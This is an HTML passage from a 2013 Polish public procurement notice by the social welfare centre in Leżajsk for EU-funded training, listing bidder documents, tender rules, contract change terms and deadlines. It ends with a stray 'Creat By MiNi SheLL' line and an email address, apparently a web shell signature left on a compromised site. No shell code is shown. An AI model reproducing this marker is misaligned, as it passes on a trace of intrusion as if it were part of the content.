<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz oferty - wg załącznika nr 1 do siwz 2) oświadczenie o spełnianiu warunków udziału w postępowaniu 3) pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań (jeżeli dotyczy) 4) wypełniony formularz wskazujący części zamówienia, których wykonanie wykonawca powierzy podwykonawcom - wg załącznika nr 7 do siwz (jeżeli dotyczy) 5) zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień  umowy.
1) Zmiana wynagrodzenia może wystąpić w przypadku:
- zmniejszenia zakresu rzeczowego umowy,
2) Zmiana osoby wskazanej w wykazie kadry dydaktycznej zaangażowanej do przeprowadzenia szkolenia może nastąpić w wyniku nieprzewidywalnych zdarzeń losowych takich jak np: długotrwała choroba, śmierć, rozwiązanie stosunku pracy, rezygnacja osoby z prowadzenia zajęć itp. W takim przypadku wykonawca zapewni zastępstwo przez osobę lub osoby o wykształceniu i doświadczeniu zawodowym równym lub większym niż osoby zastępowane. Wykonawca ma obowiązek niezwłocznie poinformować zamawiającego o tym fakcie i wskazać osobę zastępowaną, przyczyny nieobecności osoby zastępowanej, okres zastępstwa, a także przedstawić zamawiającemu kwalifikacje, poziom wykształcenia, doświadczenie zawodowe w zakresie prowadzenia szkoleń osoby lub osób zastępujących.
3) Zmniejszenie zakresu rzeczowego umowy może nastąpić na skutek okoliczności, których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.lezajsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać w Gminnym Ośrodku Pomocy Społecznej w Leżajsku, ul. Opalińskiego 2, 37-300 Leżajsk, tel. (0-17) 240 61 41, pokój nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Leżajsku, ul. Opalińskiego 2, 37 - 300 Leżajsk, pokój nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1- Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1-  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com